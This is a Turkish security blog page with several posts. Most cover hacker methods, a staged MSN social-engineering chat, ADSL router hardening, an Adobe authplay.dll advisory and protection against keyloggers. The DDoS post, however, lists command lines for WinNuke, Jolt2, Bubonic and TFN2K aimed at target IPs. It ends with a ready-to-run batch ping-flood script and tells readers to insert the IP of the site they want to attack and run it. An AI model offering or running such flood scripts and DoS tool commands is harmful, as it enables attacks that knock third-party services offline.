Murat TATAR God saves lost souls , I save lost passwords

1Nis/110

Internet Korsanları ve Bilgi Guvenliginin Onemi

Günümüz de bilgisayarlar ağlarının güvensizliğinden yararlanarak bilgi hırsızlığı, sahtecilik ve birçok olta oyunu oynanmakta. Gözlemlediğim kadarı ile Türkiye’de kişisel bilgi güvenliğini sağlamak için yeteri kadar bilgilendirme yapılmamaktadır. Meydanı boş bulan internet korsanları (Hacker) bilgi hırsızlığı ve anket amaçlı kullanmak için kişisel bilgilerinizi toplamakta ve firmalara belli bir ücret karşılığı satmaktadırlar ya da kişisel bir hedef haline gelen kurban hakkın da bilgi edinip internet üzerinden çok büyük zararlar verebilirler.

Bir İnternet Korsanı nasıl bir plan üzerin de çalışır inceleyelim;
1-Ön bilgi edinme
2-Tarama
3-Erişim kazanma
•    İşletim sistemi ve ya uygulama düzeyinde
•    Ağ düzeyinde
•    Servis dışı bırakma (Denial Of Service/DOS)
4-Erişimden faydalanma
•    Program ve ya veri indirme
•    Program ve ya veri yükleme/gönderme
•    Sistemde/dosyalarda değişiklik yapma
5-İzleri yok etme

İnternet korsanları kendilerine hedef seçtikleri kurban’ı izlemeye alır ve kurban hakkındaki kişisel bilgileri toplar. Nedir bu kişisel bilgiler? Adınız, Soyadınız, Kimlik No, Okuduğunuz okul, Sınıf/bölüm, Anne adı, Baba adı, Anne kızlık soyadı, Telefon numaranız ve en önemlisi de banka kartı numaranız.(!) Korsanlar gerekli kişisel bilgileri toplamak için en iyi bildikleri strateji yöntemlerini uygularlar.  Aslın da bu yöntemlerden korunmak çokta zor değildir, biz internet kullanıcıları bilgi güvenliğini dikkate almadığımız için hep mağdur duruma düşeriz.

İnternet Korsanları ne gibi yöntemler kullanırlar ?

Virüs;
Bilgisayar virüsleri, bilgisayarın çalışmasını engelleyecek, verileri kaydedecek, bozacak veya silecek ya da kendilerini Internet üzerinden diğer bilgisayarlara yayarak yavaşlamalara veya başka sorunlara neden olacak şekilde tasarlanmış yazılım programlarıdır.

İnsanlara bulaşan virüslerin 24 saatte geçen grip mikrobundan Ebola virüsüne kadar çeşitli türevleri olduğu gibi, bilgisayar virüsleri de muzip virüslerden oldukça zarar verici olanlarına kadar yeni ve çeşitli biçimlerde görülür. Ancak biraz bilgi ve birkaç koruma önlemiyle, virüslere karşı daha az savunmasız olabilir ve etkilerini azaltabilirsiniz.

Not: Bilinen virüslerin hiçbiri bilgisayarınızdaki disk sürücüleri veya monitörler gibi donanımlara zarar verme becerisine sahip değildir. Fiziksel zarar verebilen virüslerle ilgili uyarılar genelde asılsız veya yanlış bilgilerdir.

Virüsler nasıl çalışır?
Temel virüsler genelde yeterli bilgisi olmayan bilgisayar kullanıcıları tarafından farkında olmadan paylaşılır veya gönderilir. Solucanlar gibi daha karmaşık olan virüsler, bir e-posta paylaşma uygulaması gibi diğer yazılımları denetleyerek kendilerini otomatik olarak çoğaltabilir ve diğer bilgisayarlara gönderebilir. Truva atı adı verilen belirli virüsler (adlarını efsanevi Truva Atı'ndan alırlar), faydalı bir program gibi görünerek kullanıcıların aldanıp onları karşıdan yüklemelerine yol açabilir. Bazı Truva atları, beklenen işlemleri yerine getiriyor gibi görünürken bir yandan da sisteminize veya ağa bağlı diğer bilgisayarlara zarar verebilir.

Trojan (Truva atı);
İki kısımdan oluşan ve bilgisayarları uzaktan kumanda etmek amacıyla yazılmış bilgisayar programcıklarıdır.  Trojanlar genel de Arka kapı olarak ta bilinirler. Trojan bilgisayarınıza girdikten sonra  trojanı yazan kodlayıcı tarafından komutlandırılmış işlemleri gerçekleştirir. En önemlisi de uzaktan yönetilmeyi etkin kılan portları açar. Trojanlar çalıştıktan sonra Cookiesleri, Kredi kartı numaranızı, Key loglarınızı, Ekran görüntülerinizi, Dosya bilgilerinizi, Metin dosyalarınızı, Msn vb. gibi internet üzerinden çalışan iletişim programlarının şifrelerini ve en önemlisi bilgisayarınız da klavye ile gerçekleştirdiğiniz her işlemi İnternet Korsanına iletir.

Spam;
İnternet üzerinde aynı mesajın yüksek sayıdaki kopyasının, bu tip bir mesajı alma talebinde bulunmamış kişilere, zorlayıcı nitelikte gönderilmesi Spam olarak adlandırılır. Spamlar genel de internet reklamcılığı kısmın da daha çok yaygındır. İnternet Korsanları istenmeyen postalar yolu ile bilgisayarınıza trojan, solucan girmesini sağlayarak kişisel bilgilerinize ulaşabilir size zarar verebilirler.

Phishing;
Bankanızın, e-postanızın veya bunun gibi bilgi girmenizi gerektiren bir kuruluşun web sayfasının bir kopyasını yapıp kullanıcısının hesap bilgilerini çalmayı amaçlayan fake sayfa diye de adlandırabileceğimiz arka plan bilgi çalma yöntemidir. İngilizce "Balık tutma" anlamına gelen "Fishing" sözcüğünün 'f' harfinin yerine 'ph' harflerinin konulmasıyla gelen terim, oltayı attığınız zaman en azından bir balık yakalayabileceğiniz düşüncesinden esinlenerek oluşturulmuş ve uygulanıyor.
Örneğin;  kullandığınız elektronik posta servisinin giriş ekranının bir kopyası elektronik posta olarak geliyor ve bir şekilde kullanıcı adınızı ve şifrenizi girmenizi istiyor. Dikkatsiz bir şekilde bilgileri verdiğinizde, sayfanın içine gizlenmiş bir kod parçası kullanıcı adınızı ve şifrenizi İnternet korsanına iletiyor.

Not: Phishing yöntemi kullanarak bilgisayar kullanıcılarını tuzaklarına düşüren dolandırıcılar, özellikle Kredi, Debit/ATM Kart Numaraları/CVV2,  Şifrelerinizi, Hesap Numaralarınızı,  İnternet Bankacılığına Girişte Kullanılan Kullanıcı Kodu ve Şifrelerinizi phishing yöntemi ile İnternet korsanları bu bilgileri elde edebiliyorlar.

Sosyal Mühendislik;
Etkilemek liderlik davranışıdır. Sosyal Mühendis dediğimiz kişiler (Toplum Mühendisleri) Lider kişilik özelliklerine sahip kişilerdir. İnternet korsanları bu yöntemi farklı şekiller de kullanmaktadırlar.. Korsanlar başka bir kimliğe bürünerek sizinle sohbet ederler ve gerekli bilgileri sohbet esnasın da toplarlar.

Msn üzerinden bir Sosyal Mühendislik örneği verecek olursak küçük bir konuşma senaryosu oluşturalım;

Msn kişi listenize eklenmek üzere bir ekleme talebi gelir..

korsan@hotmail.com sizi kişi listesine eklemek için davet ediyor (kabul ettiniz)

Korsanın adı: Mert,  Kurbanın adı: Hülya olsun..

Korsan: Merhabalar Hülya ben Pamukkale üniversitesi işletme bölümünden Mert..
Kurban: Merhaba ben Hülya size nasıl yardımcı olabilirim?

Korsan: Rahatsız ettiğim için çok üzgünüm.. İstatistik programı hakkın da senden bilgi alabilirliyim?
Kurban: Olabilir tabii ki.

Korsan: Bu arada çok özür dilerim tanışamadık, Ben Mert söz ettiğim gibi işletme bölümü okuyorum bu sene dersler çok ağır..
Kurban: Ben Hülya Pamukkale Üniversitesinde okuyorum.. Bu arada msn adresimi nerden aldını öğrenebilirliyim Mert.

Korsan: Pamukkale Üniversitesi Organizasyon toplantısından almıştım iktisat okudunu görünce yardımcı olabileceğini düşündüm. Not aldım..
Kurban: Tamam pek inandırıcı olmadı ama neyseh..
Kurban:  Tamam bir makale var elim de paylaşabilirim bir dakika beklermisin ?
Korsan: Tabiki.

Birkaç dk geçer aradan..

Kurban: Mert tamam dosya burada yolluyorum hemen inşallah yardımcı olabilmişimdir..
Korsan: Sağ ol bulmak istediğim makale buydu.
Kurban: Hiç önemli değil yardım edebildiysem ne mutlu bana.
Korsan: Teşekkürler Hülya, Allah razı olsun, sende olmasan kimse yardımcı olamayacak
Kurban: Hiç Önemli değil her zaman yardım ederim J
Korsan: Şimdilik bana müsaade her şey için teşekkür ederim.. Allah razı olsun.
Kurban: İyi günler Mert görüşmek üzere.

… der ve Korsan ertesi gün planlarını yoluna koyar.. Korsan için gerekli bilgiler okul numarası ve kimlik numarasıdır.  Korsan burada ön tanışmayı gerçekleştirmiş ve akıcı konuşması ile kurbandan bilgi sızdırmak için gerekli ön  tanışmayı sağlamıştır.

Ertesi gün kurban yine msn adresini açar ve size selam verir..

Korsan: Merhaba Hülya ne haber..
Kurban: Hoş geldin Mert iyiyim çok şükür, senden ne haber makale işini gördümü?

Korsan: Evet sanırım geçicem hoca olumlu dedi, Çok sağol Hülya sende olmasan ne yapardım bilmiyorum. Hülya notlar sayfasına ulaşamıyorum galiba kullanıcı adım engellenmiş bir bakarmısın sorun bendemi yoksa sitede mi?

Kurban: Tamam bakıyorum.. bir dakika.
Kurban: Sende sorun var ya adın engellenmiş herhalde..
Korsan: Tamam senin adın üzerinden girip bakabilirmiyim?
Kurban: Tabi şifre: sekerkiz20 kullanıcı adı: hülya07

(Kişi bilgisiz olunca şifresini kendi elleri ile teslim ediyor)

Arkadaşlar notlar sayfasında sizin ile ilgili kişisel bilgiler özeti bulunmaktadır ve korsan amacına ulaşmıştır. Kurban aynı okuldan sandığı Korsana güvenerek şifresini vermiştir, fakat korsan sadece sosyal mühendislik yapmış ve kendi bilgilerini paylaşmamıştır. Amacına uygun planlamayı yapan korsan planını uygulamaya koyduktan 2 gün sonra amacına ulaşmıştır. Bu ikili arasında geçen konuşma kimlik bilgilerine ulaşmanın en kolay yolu stratejisini  uygulayarak korsan gerekli bilgilere ulaşmıştır.

Korsan ulaştığı bilgiler ile sahte kredi kartı düzenleyerek ve kimlik cüzdanı düzenleyerek  üzerinizden kredi kartı başvurusu yapabilir, kimliğiniz üzerinden alışveriş yapabilir ve başka amaçları için kullanabilir.

 

İnternet Korsanından (Hacker) korunmanın yolları:

  • Bilgisayarınız da güncel bir anti virüs programı kurulu olmalıdır.
  • Güvenli olduğundan emin olmadığınız internet sitelerine girmeyiniz.
  • Tanımadığınız kişiler ile sohbet etmeyiniz, dosya paylaşımın da bulunmayınız.
  • Msn deki kullanıcı adı ve parola kısmını kayıtlı bırakmayınız.
  • Ortak ağlar da bilgisayarınızı paylaşıma kapatınız ve zorunlu olmadıkça bilgisayarınızı ortak ağlara erişime izin vermeyiniz.
  • Msn şifre kırıcı, bilgisayara gir gibi makalelerin tamamı sosyal mühendislik üzerine kurulu olup sizi oltaya düşürmek için sitede paylaşılmıştır. Güvenliğinden emin olmadığınız sitelerden bilgi alışverişi yapmayınız.
  • Kablosuz internet kullanıyorsanız WPA2 statüsün de şifreleyiniz ve SSID kullanıcı adını gizleyiniz.
  • Güvenli olmayan kablosuz ağlara girmeyiniz. Unutmayın ki ağ üzerinden bilgi sızdırmak çok daha kolaydır.
  • Forum, blog vb. sitelerdeki kullanıcı adını kayıtlı bırakmayınız.
  • Msn şifrenizi, kredi kartı numaranızı, kimlik numaranızı ve kişisel bilgilerinizi kimse ile paylaşmayınız.
  • Uzun ve Karışık değil, Güçlü şifreler yaratın!
    Önemli olan uzun yada karışık şifreler üretmek değil, güçlü şifreler üretmektir.  Bunun için şifrenizin ;  En az 4 en çok 16 karakter aralığında olması, Harf – Rakam – Sembol barındırması, Ortalama 4 harf, 2 rakam ve 2 de sembol kullanılan toplamda 8 karakterli şifre üretilmesi güvenli olur.

Kırılmaz, Güvenli şifreler yaratırken neler yapmamalıyız?

ü  Oluşturduğunuz parolayı,  başta bilgisayarınız olmak üzere hiçbir yere not etmeyiniz.
(Ajanda, not defteri dâhil)

ü   İşiniz icabı farklı yerlere sürekli kayıt olarak, şifre girmeniz gerekiyorsa devamlı olarak birbirinden bağımsız şifreler kullanın.

ü   Eşinizin, sevgilinizin, çocuklarınızın ya da birinci dereceden yakınlarınızın isimlerini şifreleriniz olarak tercih etmeyin.

Not: Şifrenin güvenliği uzunluğuna göre değil, karakteristik kodlanmaya dayanır.

1Nis/110

ADSL Yonlendirici Guvenligi

Bu yazıda yaygın olarak kullanılan ADSL yönlendiricileri (ADSL modem olarakta bilinirler) güvenli hale getirme yolları hakkında bilgi verilmiştir.
Kişisel bilgi güvenliği günümüzde çok önemli hale gelmiştir. Bilgisayarımızda farkında olmasak da çok fazla kişisel bilgi bulunduruyoruz. Banka hesap şifreleri, e-posta hesap şifreleri, özlük bilgileri, vs. gibi kişisel bilgilerimizi sürekli İnternet’te kullanıyoruz. Güvenliği sağlanmamış bir ADSL yönlendirici üzerinden İnternet’e çıkılması bu bilgileri tehlikeye atmaktadır.

ADSL hattımızın başkaları tarafından kullanılmasının engellenmesi gereklidir. Çünkü ADSL hatları üzerinden yapılacak her türlü işlemden hattın resmi sahibi sorumludur. 5651 numaralı Türk Ceza kanununda İnternet’in ortak kullanım şartları ve ADSL kullanıcılarının 3. şahıslara İnternet hizmeti verme koşulları belirlenmiştir. Bu şartlar sağlanmadan İnternet bağlantısının bir başkasına kullandırılması durumunda, bu bağlantı üzerinden yapılacak işlemlerden hattın sahibi sorumlu tutulur.

ADSL yönlendiricilerin güvenliğini sağlamak için dikkat edilmesi gerekilen noktalar şu şekilde sıralanabilir:

1. ADSL Bağlantısının İzinsiz/Ortak Kullanılması ADSL bağlantısının başkalarıyla ortak kullanılması her ne kadar zararsız olarak düşünülse de, aslında çok tehlikelidir. İnternet hızının düşmesi ve kota aşımı sonucu hat sahibine yüksek faturalar gelmesi ADSL bağlantısını bir başkasının kullanmasında ilk ortaya çıkan zararlardır. ADSL bağlantısını bir başkasının kullanması durumunda, hat sahibi bu hat üzerinden gerçekleştirilen yasaklı ve zararlı içerik barındıran sitelere girilmesi, diğer bilgisayarlara saldırı yapılması, vs. gibi suç teşkil eden faaliyetlerden sorumlu tutulabilir. ADSL hattının resmi sahibinin, ADSL bağlantısını yasal ve teknik risklerinden dolayı ortak kullandırmaması tavsiye edilmektedir. Ayrıca ADSL hattı sahibi ADSL yönlendiricisine izinsiz yapılacak bağlantı isteklerini engellemek için gerekli önlemleri almalıdır.

2. Kablosuz iletişim
Kablosuz yayın yapan ADSL yönlendiricilerde, bilgisayar ile ADSL yönlendirici arasındaki iletişimin çevredeki şahıslar tarafından dinlenilmesi mümkündür. Kablosuz yayında iletişim hava yolu ile yapıldığından, yani fiziksel olarak iletişimi kontrol edemediğimizden dolayı kablosuz ADSL yönlendirici ile yapılan iletişimi dinleyen bir saldırganın İnternet’te yapılan işlemleri görmesi, e-posta ve banka hesap şifreleri gibi kişisel bilgileri ele geçirmesi mümkündür. Bunun yanında bilgisayar ile ADSL yönlendirici arasında giden verileri değiştirerek İnternet kullanıcısını yanlış yönlendirmesi de mümkündür. Bu soruna çözüm olarak saldırganın iletişimi anlamaması için iletişimin şifrelenmesi yoluna gidilmiştir. Kablosuz iletişim için geliştirilen ilk şifreleme algoritması olan WEP algoritmasının zayıflığından dolayı ve kısa sürede kırılabildiği için güvenli değildir. Şifreleme algoritması olarak WEP’in kolayca kırılabilmesinden dolayı geliştirilen, daha güçlü algoritmaları olan WPA-WPA2 algoritmaları kullanılmalıdır.

Kablosuz ADSL yönlendiriciler çevrelerindeki cihazlara varlıklarını bildirmek için kendilerini tanımlayan SSID adında bir bilgi gönderirler. Bir bilgisayarın kablosuz ADSL yönlendirici ile iletişim kurabilmesi için yönlendiricinin SSID’sini bilmesi gerekir. SSID’lere ön tanımlı (default) değerlerinden başka değerler verilmelidir. Çünkü SSID’si ön tanımlı olan bir ADSL yönlendirici, başta model bilgisi olmak üzere kendisi hakkında birçok bilgi verir. Bunun yanında SSID, şifreleme algoritmalarının içinde kullanıldığı için ön tanımlı değerlerle yapılan şifreleme daha zayıf olacaktır.

SSID gizlenerek, yani otomatik SSID gönderimi kapatılarak, çevredeki bilgisayarların kablosuz ADSL yönlendiriciyi görmesi engellenebilir. Buna rağmen çevredeki gizlenmiş kablosuz yönlendiricileri bulmak için geliştirilmiş yöntemler mevcuttur. Aktif olarak çevredeki kablosuz ADSL yönlendiricileri tarayan saldırganlara karşı tam bir önlem sağlanamasa bile SSID’nin gizlenmesi çevredeki birçok bilgisayar kullanıcısını ADSL yönlendiriciden uzak tutar.

3. Web Yönetim Arayüzü

ADSL yönlendiricileri yönetmek için kullanılan yönlendirici web yönetim arayüzlerinin ön tanımlı olarak gelen şifreleri değiştirilmelidir. Birçok ADSL yönlendirici için ön tanımlı olarak gelen “web” yönetim arayüzü şifreleri İnternet’te basit bir araştırma yapılarak bulunabilmektedir. Ulusal Bilgi Güvenliği Kapısında yapılan bir araştırmaya göre [1] , Türkiye çapında belli sayıda IP taranmış, 80. TCP portu (HTTP) açık olan, yani web yönetim arayüzü İnternet’e açık olan belli model ADSL yönlendiricilerin %46’sında şifrelerin hiç değiştirilmemiş olduğu keşfedilmiştir. Yani taranan ADSL yönlendiricilerde web yönetim arayüzü İnternet’e açık olanların yarısına ön tanımlı şifreler kullanılarak bağlanılabileceği ortaya konulmuştur.

4. Kullanılmayan servisler
ADSL yönlendirici üzerindeki FTP, SNMP, ICMP, Telnet ve HTTP gibi servisler kullanılmadıkları takdirde kapatılmalıdır. ADSL yönlendiriciye İnternet üzerinden erişim yani tüm dış ağ servisleri kapatılmalıdır. ADSL yönlendiriciye bağlanmak için sadece kullanıcının bilgisayarına erişim hakkı verilmelidir.

5. Güvenlik Duvarı ADSL yönlendiricilerde güvenlik duvarı aktif hale getirilmelidir. Güvenlik duvarı İnternet’ten gelen yetkisiz bağlantı isteklerini engeller. IP ve port bazında erişim kontrolü sağlayarak ADSL yönlendiriciye izinsiz erişime engel olur.

6. MAC Adres Filtrelemesi
ADSL yönlendiriciye bağlanabilecek bilgisayarları kısıtlamak için MAC adres filtrelemesi uygulanmalıdır. MAC adresleri İnternet’e bağlanan her cihaz için benzersiz olarak üretilen numaralardır. ADSL yönlendiriciye bağlanabilecek MAC adresleri tanımlanarak yönlendiriciye sadece istenilen bilgisayarların erişimi sağlanmış olur.

Kısaltmalar:
ADSL: Asymmetric Digital Subscriber Line

MAC: Media Access Control

SSID: Service Set IDentifier

WEP: Wired Equivalent Privacy

WPA: Wi-Fi Protected Access

FTP: File Transfer Protocol

ICMP: Internet Control Message Protocol

SNMP: Simple Network Management Protocol

HTTP: HyperText Transfer Protocol

1Nis/110

DDoS atakları Nedir?

DDoS atakları Nedir?

Bir saldırgan daha önceden tasarladığı BİR ÇOK makine üzerinden hedef bilgisayara saldırı yaparak hedef sistemin kimseye hizmet veremez hale gelmesini amaçlayan bir saldırı çeşididir.

Koordineli olarak yapılan bu işlem hem saldırının boyutunu artırır hem de saldırıyı yapan kişinin gizlenmesini sağlar. Bu işlemleri yapan araçlara Zombi denir.
Bu saldırı çeşidinde saldırganı bulmak zorlaşır.

Çünkü saldırının merkezinde bulunan saldırgan aslında saldırıya katılmaz. Sadece diğer ip numaralarını yönlendirir.Eğer saldırı bir tek ip adresinden yapılırsa bir Firewall bunu rahatlıkla engelliyebilir. Fakat saldırı daha yüksek sayıdaki ip adresinden gelmesi Firewall un devre dışı kalmasını sağlar(Log taşması firewall servislerini durdurur).İşte bu özelliği onu DoS sadırısından ayıran en önemli özelliğidir.

================================================== ======

DoS Ataklarının Türleri?

Service Overloading: Bu atak tipi belirli host ve servisleri düşürmek için kullanılır. Atak yapan kişi özel port ve host a bir çok ICMP paketi gönderir.Bu olay network monitör ile kolayca anlaşılır

Message flooding: Service Overloading den farkı sistemin normal çalışmasını engellemez. Yine aynı şekilde gönderilen paketler bu sefer normal olarak algılanır. Örnek Nis serverında flood yapılırsa (Unix network) Nis bunu şifre şifre isteği gibi görür. Ve saldırganın host a hükmetmesi sağlanır.

Clogging: Saldırganın SYN gönderip ACK alıp ondan sonrada gelen ACK ya cevap vermeyip sürekli syn göndermesinden oluşur. Bu durum defalarca kez tekrarlanırsa server artık cevap veremez hale gelir. Bu paketler sahte ip ile gönderildiğinden sistem bunu anlayamaz ve hizmeti keser. Anlasa ne olur, anlasa aynı ip den gelen o kadar istege cevap vermez. Kurtuluş yolu bunları tarayan firewall lardır.

DoS Atakları için kullanılan programlar?

Ping Of Death
Bir saldırgan hedef aldığı bir makineye büyük ping paketleri gönderir. Birçok işletim sistemi gelen bu maksimum derecede paketleri anlayamaz, cevap vermez duruma gelir ve işletim sistemi ya ağdan düşer ya da çöker.
SSPing
SSPing bir DoS aracıdır.SSPing programı hedef sisteme yüksek miktarda ICMP veri paketleri gönderir. İşletim sistemi bu aldığı data paketlerini birbirinden ayırmaya çalışır.Sonuç olarak bir hafıza taşması yaşar ve hizmet vermeyi durdurur.

Land Exploit
Land Exploit bir DoS atak programıdır. TCP SYN paketiyle hedef sisteme saldırıdır. Saldırı aynı port numarasına sürekli olarak yapılır. Land Expoit aynı kaynak ve hedef portları kullanarak SYN paketleri gönderir.
Bir Çok Makine bu kadar yüklenmeyi kaldıramayacağı için Buffer overflow yaşar ve hiçbir bağlantıyı kabul edemeyecek duruma gelir.

Smurf
Smurf broadcast adreslere ICMP paketleri gönderen bir DoS Saldırı programıdır.Saldırgan ICMP echo istekleri yapan kaynak adresi değiştirerek ip broadcast a gönderir. Bu broadcast network üzerindeki her makinenin bu istekleri almasına ve her makinenin bu sahte ipli adrese cevap vermesini sağlar.Bu sayede yüksek seviyede network trafiği yaşanır. Sonuç olarak bir DoS saldırısı gerçekleşmiş olur.
Bir TCP bağlantısının başında istekte bulunan uygulama SYN paketi gönderir. Buna cevaben alıcı site SYN-ACK paketi göndererek isteği aldığını teyit eder. Herhangi bir sebeple SYN-ACK paketi gidemezse alıcı site bunları biriktirir ve periyodik olarak göndermeye çalışır.
Zombilerde kullanılarak, kurban siteye dönüş adresi kullanımda olmayan bir IP numarası olan çok fazla sayıda SYN paketi gönderilirse hedef sistem SYN-ACK paketlerini geri gönderemez ve biriktirir. Sonuçta bu birikim kuyrukların dolup taşmasına sebep olur ve hedef sistem normal kullanıcılarına hizmet verememeye başlar.

WinNuke
WinNuke programı hedef sistemin 139 nolu portuna “out of band” adı verilen verileri gönderir. Hedef bunları tanımlayamaz ve sistem kilitlenir.
Kullanımı
WNUKE4 -c XXX.com 10000 0 450
(hedefe 10,000 adet 450 byte lık icmp paketleri gönderir.)
WNUKE4 -n XXX.com 0 1024-2024 6667-6668 UNPORT

Jolt2
Jolt2 kendisini farklı segmentte bulunuyormuş izlenimi vererek NT/2000 makinelere DoS atak yapabilen bir programdır. İllegal paketler göndererek hedefin işlemcisini %100 çalıştırıp kilitlenmesine yol açar.
c: \> jolt2 1.2.3.4 -p 80 4.5.6.7
Komut satırında görülen, 1.2.3.4 ip numarası saldırganın spoof edilmiş adresidir. Hedef adresin 4.5.6.7 80 nolu portuna saldırı yapar.
CPU kaynaklarını tamamını harcar ve sistemi aksatır

Bubonic.c
Bubonic.c Windows 2000 makineleri üzerinde DoS exploit lerinden faydalanarak çalışan bir programdır.
Hedefe düzenli olarak TCP paketlerini gönderir.
c: \> bubonic 12.23.23.2 10.0.0.1 100

Targa
Targa 8 farklı modül içinde saldırı yapabilen bir Denial of Service Programıdır.
================================================== =======

DDoS Atakları için kullanılan programlar?
1.Trinoo
2.TFN
3.Stacheldraht
4.Shaft
5.TFN2K
6.mstream
================================================== =======

DDOS – Saldırı Yöntemi

Tüm DDoS programları iki safhada çalışır.
Mass-intrusion Phase – Bu safhada DoS saldırısı yapacak olan sistemlere ulaşılır ve saldırıyı gerçekleştirecek olan programlar yüklenir. Bunlar birincil kurbanlardır.
DDoS Attack Phase – Bu safhada hedef sitelere saldırı yapılır bunun içinde birincil kurbanlar kullanılarak hedefe yüklenilir.

Trinoo
Trinoo DDoS yöntemini kullanan ilk programdır.
Kullandığı TCP Portları:
Attacker to master: 27665/tcp
Master to daemon: 27444/udp
Daemon to master: 31335/udp

TFN2K
Zombilerin yüklendiği makineler listening modda çalışır. Her an karşıdan gelecek komutlara hazırdır.
Running the server
#td
Running the client
#tn -h 23.4.56.4 -c8 -i 56.3.4.5 bu komut 23.4.56.4 nolu ipden 56.3.4.5 nolu ip ye saldırı başlatır.

Stacheldraht
TFN ve Trinoo gibi çalışır fakat modüllerine paketleri kriptolu gönderebilir.
Kullandığı portlar TCP ve ICMP
Client to Handler: 16660 TCP
Handler to and from agents: 65000 ICMP

@echo off
set count=
:loop
set count=%count%x
start /b ping ip -l 65500 -n 30
if not "%count%"=="xxxxxxxxxxxxxxxxxxxx" goto loop
:end

yukaridaki kodun icinde bulunan "ip" kismina saldiri yapmak istediginiz sitenin ip numarasini yazarsaniz. sonrasinda bu kod'u note pade'e ( not defteri ) yapistirip dosya adini "joker.bat" olarak kaydederseniz. basit bir ddos mantigini bilgisayarinizda joker.bat dosyasina cift tiklayarak calistirabilirsiniz.

Incoming search terms:

land exploit indirland exploitland exploit downloadwinnuke downloadsmurf saldırısıwinnuke
1Nis/110

Authplay.dll Adobe Guvenlik Acigi

Adobe Flash Player, Adobe Reader ve Acrobat ürünleri için bir güvenlik bülteni yayımlandı. Bu bülten içerisinde Adobe yazılımları içerisindeki Authplay.dll dosyasından kaynaklanan bir güvenlik açığı ortaya çıktığını ve bu dosyanın sisteminizden silinmesi gerektiğini bildirdi. Yapılan açıklamaya göre Authplay.dll dosyası içerisindeki bir kritik güvenlik açığı sayesinde hackerler sistemlerinizi ele geçirebilir yada çökertebilir.

Biraz önce güncellemeleri kontrol ettiğimde henüz bir güvenlik güncellemesi çıkmadığını gördüm. Adobe’un internet sayfasında yapılan açıklamaya göre önümüzdeki günlerde bir güvenlik güncelleştirmesi çıkartılacak. Fakat şimdilik kendinizi kötü niyetli (hacker) kişilerden korumanız için sisteminizdeki

Authplay.dll

Dosyasını silmeniz gerekiyor. Adobe Flash Player, Adobe Reader ve Acrobat ürünlerinde ortaya çıkan bu güvenlik açıklığı için henüz bir yama çıkartılmamış olsa da bu dosyayı sisteminizden silmek sisteminizi korumanız için yeterli olacaktır.

Adobe açıklaması; http://www.adobe.com/support/security/

Dosyanın bulunduğu dizin Windows;

Adobe Reader 9.x ve Acrobat 9.x

C:\Program Files\Adobe\Reader 9.0\Reader\authplay.dll

C:\Program Files\Adobe\Acrobat 9.0\Acrobat\authplay.dll

UNIX – Solaris

Reader9/Reader/intellinux/lib/ (Linux)
Reader9/Reader/intelsolaris/lib/ (for Solaris)

“libauthplay.so.0.0.0″  dosyasını siliniz.

Ayrıca Mac kullanıcıları da bu açıktan etkilenmiş durumda.

1Nis/110

Mail Saldırı (Attack) ve Guvenlik Onlemleri

Bir çok mailim hacklendi konularını kaç senedir görürsünüz. Belki siz belki arkadaşlarınız mail hesapları çalınmış olabilir.İşte çalınmaya karşı ne zamandır bir takım önlemlerden bahsedilir durulur,bu önlemler gelişen yöntemler ve günümüzün sistemleri ile artık eskisi kadar etkili olamamaktadır.Yani Tam bir Güvenlik sağlamamaktadır. Öncelikle şu ana kadar bildiğiniz tüm güvenlik yöntemlerini unutmanızı istiyorum.Ve 2010 ’un en çok kullanılan yöntemlerini ve korunma yöntemlerini tek tek irdeleyelim.

KeyLogger & Trojan Security :

Keylogger ve Trojan lar genellikle kullanıcılara dosya biçiminde server’ı yükletip  pc sine RAT ile bağlanma ya da pc deki tüm passlar(şifreler), konuşmalar,sistem bilgileri vs. çekmeye dayanır.

Bu Tür Zararlı Programlardan Korunmanın en önemli Yolları :

A1) Güvenlik Duvarı (Ateş Duvarı) : Kullanıcı Pc lere hacker girişini engellemek için kullanılır..Windowsun kendi firewallı etkili olmamakta birlikte çabuk aşılacağından Tavsiyem Combo gibi v.b gibi programlar kullanmanızdır.

A2) Antivirüs Programı: Bilgisayarınızı lisanslı  Antivirus yazımı kullanıp güncel tutmanız, aldığınız dosyalarda trojan,Keylogger gibi casusları bulmanızda ve silmenizde çok önemli bir yer tutmaktadır.

A3) 1 ve 2 nin birleşimi her zaman daha önemlidir. Eğer  trojanımız tanınmaz ise bu sefer devreye İnternet Security programları girecektir.Güvenlik duvarıda dahil Sayfa yı tempe indirmeden tarama gibi bir çok özelliklere sahiptir. Bir dosyadaki şüpheli hareketleri görürse bloglama veri transferlerini inceleme gibi özellikleri ile sezgisel olarak trojan olup olmadığını anlayarak size uyarmaktadır. Bu yüzden İnternet Security programlarınızı kullanmanız gerekir.

A4) Şüpheli Dosyayı Analize Göndermek: Çoğu antivirus programlarında Lab özelliği vardır yani inceleme için laboratuvara gönderebilirsiniz. Size gelen şüpheli bir dosya varsa bunu açmadan Lab a ya da virustotal.com gibi sitelere göndererek tüm antiviruslara test amaçlı sunup dosyanın güvenirliğini anlayabilirsiniz. http://www.virustotal.com/vtsetup.exe bu programıda indirerek masaüstündeki bir dosyaya sağ tıkla gönderden virustotalı seçerek orada incelemeye kısayoldan gönderebilirsiniz.

A5) AntiKeylogger Programları Yüklemek: Anti keylogger yazılımları dosyanın trojan olma ihtimalini daha doğrusu nerelere erişim yapmaya çalıştığını farkederek size uyarılarda bulunur.Tavsiye edeceğim bir Türk yazılım olan Zemana AntiKeylogger programıdır.

A6) Sosyal Mühendislikten Korunmak: Bu konuda asıl amaç dikkatli olmaktır. Msnden yollanan her dosyayı almayın. Mail olarak gelen resim formatıda dahil hiç bir dosyayı emin olmadan açmayın. Sanaldaki hiç bir kişiye tam olarak güvenmeyin ve şüpheci olun.

A7) Dosyaları Sanal Pc de ya da Windows ortamından farklı bir işletim sistemi kullanarak açın.Uzman kişiler aynı makinaya çift işletim sistemi kurabilirler sizde bunu yaparsanız yada Virtual Pc 2007 gibi Sanal bir bilgisayar oluşturup şüpheli dosyaları orada açarsanız.Ne olduğunu anlayıp ona göre işlem yapabilirsiniz.

HtmL Logger Security :

Html Logger tarayıcılardaki açıkları kullanarak Site linkini hedefe tıklattırıp pc sine trojanı download ettirmeyi çalışan bir yöntemdir .Html Loggerlar İnternet Tarayıcılarına özgüdür ve kodları farklıdır.
Html Loggerlardan Korunma Yöntemleri ise :

B1) “A3″ de Belirttiğim gibi İnternet security programları bunda en önemli koruyucu etkendir. Normal bir Antivirus programı dosyayı tempe indirdikten sorna taradığı için direk serverı pcye indirebilir bu yüzden etkili değildir.İnternet security programları site üzerinde tarama yaparak bunu önler.

